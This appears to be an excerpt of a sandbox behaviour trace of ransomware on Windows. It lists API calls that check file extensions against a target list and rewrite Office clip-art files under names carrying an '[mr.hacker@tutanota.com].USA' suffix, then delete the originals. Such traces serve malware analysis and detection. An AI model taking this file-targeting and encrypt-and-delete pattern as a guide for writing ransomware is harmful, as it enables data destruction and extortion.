(lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.024] lstrlenW (lpString=".doc") returned 4 [0269.024] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.024] lstrlenW (lpString=".docx") returned 5 [0269.024] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.024] lstrlenW (lpString=".pdf") returned 4 [0269.024] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.024] lstrlenW (lpString=".xls") returned 4 [0269.024] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.024] lstrlenW (lpString=".xlsx") returned 5 [0269.024] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.024] lstrlenW (lpString=".ppt") returned 4 [0269.024] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.024] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.024] lstrlenW (lpString=".zip") returned 4 [0269.024] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.024] lstrlenW (lpString=".rar") returned 4 [0269.024] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.024] lstrlenW (lpString=".bz2") returned 4 [0269.024] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.139] lstrlenW (lpString=".7z") returned 3 [0269.139] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.139] lstrlenW (lpString=".dbf") returned 4 [0269.139] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.139] lstrlenW (lpString=".1cd") returned 4 [0269.139] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00687_.WMF") returned 63 [0269.140] lstrlenW (lpString=".jpg") returned 4 [0269.140] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.140] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.140] lstrlenW (lpString="DD01138_.WMF") returned 12 [0269.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.159] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=3692) returned 1 [0269.159] CloseHandle (hObject=0x348) returned 1 [0269.159] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf")) returned 0x20 [0269.185] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0269.223] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.223] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.270] GetLastError () returned 0x0 [0269.270] ReadFile (in: hFile=0x2b4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xe6c, lpOverlapped=0x0) returned 1 [0269.274] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xe70, lpOverlapped=0x0) returned 1 [0269.274] ReadFile (in: hFile=0x2b4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.274] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.274] SetEndOfFile (hFile=0x384) returned 1 [0269.274] CloseHandle (hObject=0x384) returned 1 [0269.274] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.274] SetEndOfFile (hFile=0x2b4) returned 1 [0269.276] CloseHandle (hObject=0x2b4) returned 1 [0269.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.289] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf")) returned 1 [0269.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.289] lstrlenW (lpString=".doc") returned 4 [0269.289] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.289] lstrlenW (lpString=".docx") returned 5 [0269.289] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.289] lstrlenW (lpString=".pdf") returned 4 [0269.289] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.289] lstrlenW (lpString=".xls") returned 4 [0269.289] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.289] lstrlenW (lpString=".xlsx") returned 5 [0269.289] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.289] lstrlenW (lpString=".ppt") returned 4 [0269.290] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.290] lstrlenW (lpString=".zip") returned 4 [0269.290] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.290] lstrlenW (lpString=".rar") returned 4 [0269.290] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString=".bz2") returned 4 [0269.290] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString=".7z") returned 3 [0269.290] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.290] lstrlenW (lpString=".dbf") returned 4 [0269.290] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.290] lstrlenW (lpString=".1cd") returned 4 [0269.290] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.290] lstrlenW (lpString=".jpg") returned 4 [0269.290] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.290] lstrlenW (lpString=".doc") returned 4 [0269.290] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString=".docx") returned 5 [0269.290] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.290] lstrlenW (lpString=".pdf") returned 4 [0269.290] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.290] lstrlenW (lpString=".xls") returned 4 [0269.290] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.290] lstrlenW (lpString=".xlsx") returned 5 [0269.291] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.291] lstrlenW (lpString=".ppt") returned 4 [0269.291] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.291] lstrlenW (lpString=".zip") returned 4 [0269.291] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.291] lstrlenW (lpString=".rar") returned 4 [0269.291] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.291] lstrlenW (lpString=".bz2") returned 4 [0269.291] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.291] lstrlenW (lpString=".7z") returned 3 [0269.291] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.291] lstrlenW (lpString=".dbf") returned 4 [0269.291] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.291] lstrlenW (lpString=".1cd") returned 4 [0269.291] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0269.291] lstrlenW (lpString=".jpg") returned 4 [0269.291] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.291] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.291] lstrlenW (lpString="DD01151_.WMF") returned 12 [0269.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.292] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2960) returned 1 [0269.292] CloseHandle (hObject=0x348) returned 1 [0269.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf")) returned 0x20 [0269.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.296] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.296] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.296] GetLastError () returned 0x0 [0269.296] ReadFile (in: hFile=0x348, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xb90, lpOverlapped=0x0) returned 1 [0269.297] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xba0, lpOverlapped=0x0) returned 1 [0269.298] ReadFile (in: hFile=0x348, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.298] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.298] SetEndOfFile (hFile=0x384) returned 1 [0269.298] CloseHandle (hObject=0x384) returned 1 [0269.298] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.298] SetEndOfFile (hFile=0x348) returned 1 [0269.300] CloseHandle (hObject=0x348) returned 1 [0269.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.300] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf")) returned 1 [0269.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.300] lstrlenW (lpString=".doc") returned 4 [0269.300] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.300] lstrlenW (lpString=".docx") returned 5 [0269.300] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.300] lstrlenW (lpString=".pdf") returned 4 [0269.301] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.301] lstrlenW (lpString=".xls") returned 4 [0269.301] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.301] lstrlenW (lpString=".xlsx") returned 5 [0269.301] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.301] lstrlenW (lpString=".ppt") returned 4 [0269.301] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.301] lstrlenW (lpString=".zip") returned 4 [0269.301] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.301] lstrlenW (lpString=".rar") returned 4 [0269.301] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.301] lstrlenW (lpString=".bz2") returned 4 [0269.301] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.301] lstrlenW (lpString=".7z") returned 3 [0269.301] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.301] lstrlenW (lpString=".dbf") returned 4 [0269.301] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.301] lstrlenW (lpString=".1cd") returned 4 [0269.301] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.301] lstrlenW (lpString=".jpg") returned 4 [0269.301] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.302] lstrlenW (lpString=".doc") returned 4 [0269.302] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.302] lstrlenW (lpString=".docx") returned 5 [0269.302] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.302] lstrlenW (lpString=".pdf") returned 4 [0269.302] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.302] lstrlenW (lpString=".xls") returned 4 [0269.302] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.302] lstrlenW (lpString=".xlsx") returned 5 [0269.302] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.302] lstrlenW (lpString=".ppt") returned 4 [0269.302] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.302] lstrlenW (lpString=".zip") returned 4 [0269.302] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.302] lstrlenW (lpString=".rar") returned 4 [0269.302] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.302] lstrlenW (lpString=".bz2") returned 4 [0269.302] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.302] lstrlenW (lpString=".7z") returned 3 [0269.302] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.302] lstrlenW (lpString=".dbf") returned 4 [0269.302] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.302] lstrlenW (lpString=".1cd") returned 4 [0269.302] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0269.302] lstrlenW (lpString=".jpg") returned 4 [0269.302] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.303] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.303] lstrlenW (lpString="DD01152_.WMF") returned 12 [0269.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.303] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2960) returned 1 [0269.303] CloseHandle (hObject=0x348) returned 1 [0269.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf")) returned 0x20 [0269.304] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.304] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.304] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.304] GetLastError () returned 0x0 [0269.304] ReadFile (in: hFile=0x348, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xb90, lpOverlapped=0x0) returned 1 [0269.306] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xba0, lpOverlapped=0x0) returned 1 [0269.307] ReadFile (in: hFile=0x348, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0269.307] WriteFile (in: hFile=0x384, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.307] SetEndOfFile (hFile=0x384) returned 1 [0269.307] CloseHandle (hObject=0x384) returned 1 [0269.307] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0269.307] SetEndOfFile (hFile=0x348) returned 1 [0269.310] CloseHandle (hObject=0x348) returned 1 [0269.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.310] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf")) returned 1 [0269.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.310] lstrlenW (lpString=".doc") returned 4 [0269.310] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.310] lstrlenW (lpString=".docx") returned 5 [0269.310] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.310] lstrlenW (lpString=".pdf") returned 4 [0269.310] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.310] lstrlenW (lpString=".xls") returned 4 [0269.310] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.310] lstrlenW (lpString=".xlsx") returned 5 [0269.311] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.311] lstrlenW (lpString=".ppt") returned 4 [0269.311] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.311] lstrlenW (lpString=".zip") returned 4 [0269.311] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.311] lstrlenW (lpString=".rar") returned 4 [0269.311] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString=".bz2") returned 4 [0269.311] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString=".7z") returned 3 [0269.311] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.311] lstrlenW (lpString=".dbf") returned 4 [0269.311] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.311] lstrlenW (lpString=".1cd") returned 4 [0269.311] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.311] lstrlenW (lpString=".jpg") returned 4 [0269.311] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0269.311] lstrlenW (lpString=".doc") returned 4 [0269.311] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString=".docx") returned 5 [0269.311] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.311] lstrlenW (lpString=".pdf") returned 4 [0269.311] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.311] lstrlenW (lpString=".xls") returned 4 [0269.311] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.312] lstrlenW (lpString=".xlsx") returned 5 [0269.312] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 